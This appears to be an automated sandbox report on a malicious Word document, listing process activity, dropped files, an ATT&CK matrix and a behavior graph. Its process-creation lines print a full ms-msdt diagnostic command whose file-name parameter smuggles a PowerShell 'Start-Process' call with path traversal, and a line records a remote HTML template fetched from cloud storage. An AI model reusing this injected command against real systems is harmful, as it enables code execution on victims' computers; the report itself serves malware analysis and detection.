          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
          Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Windows\SysWOW64\MSFTEDIT.DLL
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5pliokiz\5pliokiz.cmdline
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\h34ip5a5\h34ip5a5.cmdline
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v2wr4cux\v2wr4cux.cmdline

          Persistence and Installation Behavior

          barindex
          Contains an external reference to another file
          Source: document.xml.relsExtracted files from sample: https://sqdocs.s3.eu-west-2.amazonaws.com/fb0f9c45-fb5f-4690-9815-e11a762d4739.html!
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\h34ip5a5\h34ip5a5.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\5pliokiz\5pliokiz.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\v2wr4cux\v2wr4cux.dllJump to dropped file
          Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_d9af2b63-3a79-4ece-a7db-529be45f68a7\DiagPackage.dllJump to dropped file
          Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_d9af2b63-3a79-4ece-a7db-529be45f68a7\en-US\DiagPackage.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_d9af2b63-3a79-4ece-a7db-529be45f68a7\DiagPackage.dllJump to dropped file
          Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_d9af2b63-3a79-4ece-a7db-529be45f68a7\en-US\DiagPackage.dll.muiJump to dropped file
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXERegistry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe TID: 6580Thread sleep count: 784 > 30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\h34ip5a5\h34ip5a5.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5pliokiz\5pliokiz.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\v2wr4cux\v2wr4cux.dllJump to dropped file
          Source: C:\Windows\SysWOW64\msdt.exeWindow / User API: threadDelayed 1712
          Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exeWindow / User API: threadDelayed 784
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES329A.tmp" "c:\Users\user\AppData\Local\Temp\5pliokiz\CSCEC77468AE1504898A4CAD2F9B69D7F46.TMP"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES48B3.tmp" "c:\Users\user\AppData\Local\Temp\h34ip5a5\CSC3AC1B580675E4658855F5C63BDA7A47F.TMP"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEE6.tmp" "c:\Users\user\AppData\Local\Temp\v2wr4cux\CSCB2D03E94AB5B4EC2978640D7F4BF95DE.TMP"
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformation
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation
          Source: C:\Windows\SysWOW64\msdt.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
          Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
          Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
          Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
          Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Command and Scripting Interpreter          		1
          DLL Side-Loading          		11
          Process Injection          		11
          Masquerading          		OS Credential Dumping1
          Query Registry          		Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts23
          Exploitation for Client Execution          		Boot or Logon Initialization Scripts1
          DLL Side-Loading          		1
          Virtualization/Sandbox Evasion          		LSASS Memory1
          Virtualization/Sandbox Evasion          		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)11
          Process Injection          		Security Account Manager1
          Application Window Discovery          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          DLL Side-Loading          		NTDS1
          Remote System Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer13
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
          File and Directory Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials13
          System Information Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 685945 Sample: icRTA4gcSe.docx Startdate: 18/08/2022 Architecture: WINDOWS Score: 92 51 Malicious sample detected (through community Yara rule) 2->51 53 Antivirus detection for dropped file 2->53 55 Antivirus / Scanner detection for submitted sample 2->55 57 5 other signatures 2->57 6 WINWORD.EXE 53 53 2->6         started        10 csc.exe 3 2->10         started        12 csc.exe 3 2->12         started        14 3 other processes 2->14 process3 dnsIp4 45 52.95.143.42, 443, 49749, 49750 AMAZONEXPANSIONGB United States 6->45 47 s3-r-w.eu-west-2.amazonaws.com 52.95.148.198, 443, 49746, 49747 AMAZON-02US United States 6->47 49 sqdocs.s3.eu-west-2.amazonaws.com 6->49 31 C:\Users\user\AppData\...\icRTA4gcSe.docx.LNK, MS 6->31 dropped 33 fb0f9c45-fb5f-4690...e11a762d4739[1].htm, HTML 6->33 dropped 35 C:\Users\user\AppData\Local\...\3A694E5B.htm, HTML 6->35 dropped 37 C:\Users\user\AppData\Local\...\3903F105.htm, HTML 6->37 dropped 16 msdt.exe 21 6->16         started        19 MSOSYNC.EXE 5 12 6->19         started        39 C:\Users\user\AppData\Local\...\v2wr4cux.dll, PE32 10->39 dropped 21 cvtres.exe 1 